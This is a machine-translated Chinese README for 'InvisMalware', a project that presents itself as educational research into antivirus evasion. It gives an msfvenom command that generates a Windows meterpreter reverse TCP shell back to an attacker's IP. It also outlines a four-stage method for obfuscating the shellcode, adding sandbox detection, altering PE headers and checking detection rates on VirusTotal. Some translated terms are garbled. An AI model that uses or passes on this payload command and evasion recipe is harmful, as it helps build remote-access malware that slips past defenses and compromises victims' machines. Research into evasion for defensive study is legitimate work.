InvisMalware

1. 介绍
2. 特征
3. 安装
4. 用法
5. 实验方法
6. 测试
7. 贡献
8. 执照

Invismalware是一个旨在展示绕过防病毒检测的先进恶意软件逃避技术的项目。该研究驱动的恶意软件实验的重点是利用混淆方法，例如代码修改和反对盒策略，以逃避静态和动态的恶意软件检测。

该项目仅用于教育目的，旨在通过从恶意演员使用的逃避技术中学习来提供对现代恶意软件防御策略的见解。

• ShellCode生成：使用MSFVENOM创建自定义反向TCP Shell有效载荷。
• 代码混淆：修改恶意软件代码，通过添加NOP，操纵PE标头等来逃避防病毒检测。
• 抗动力分析：包括检测沙箱环境（例如音频驱动程序和USB设备的存在）的检查。
• PE标头操纵：通过调整便携式可执行文件（PE）标头以避免基于签名的检测来掩盖恶意软件。
• 逃避率计算：通过比较各种防病毒发动机的结果来衡量逃避技术的有效性。

首先，请克隆存储库并安装必要的依赖项。

• Python 3.x
• VirtualBox/VMware（用于在虚拟环境中测试）
• metasploit框架（用于生成壳牌）
• PE-BER （用于PE标题操作）

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

使用MSFVENOM生成反向TCP ShellCode：

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

编辑evilexp.c文件以混淆代码并避免检测。

将恶意软件部署在安全，孤立的虚拟机中，以测试其行为并测量检测率。

将您的恶意软件上传到Virustotal，以评估其在多个防病毒引擎中的逃避率。

该项目遵循四阶段的方法来实现恶意软件：

1. ShellCode生成：创建基线反向外壳密码。
2. 代码修改：混淆壳码以逃避检测。
3. 反动态分析：将沙箱检测添加到旁路动态分析工具中。
4. PE标头修改：更改PE标头以进一步混淆恶意软件签名。

在虚拟机上运行配备防病毒软件的恶意软件，例如Kaspersky ， Windows Defender或BitDefender 。

将修改后的恶意软件上传到Virustotal ，并检查多少防病毒引擎成功检测到它。

我们欢迎捐款改善项目。如果您想贡献：

1. 分叉存储库。
2. 为您的功能或错误修复创建一个新的分支。
3. 提交拉动请求，其中包含有关您更改的详细信息。

该项目已根据MIT许可获得许可。有关详细信息，请参见许可证文件。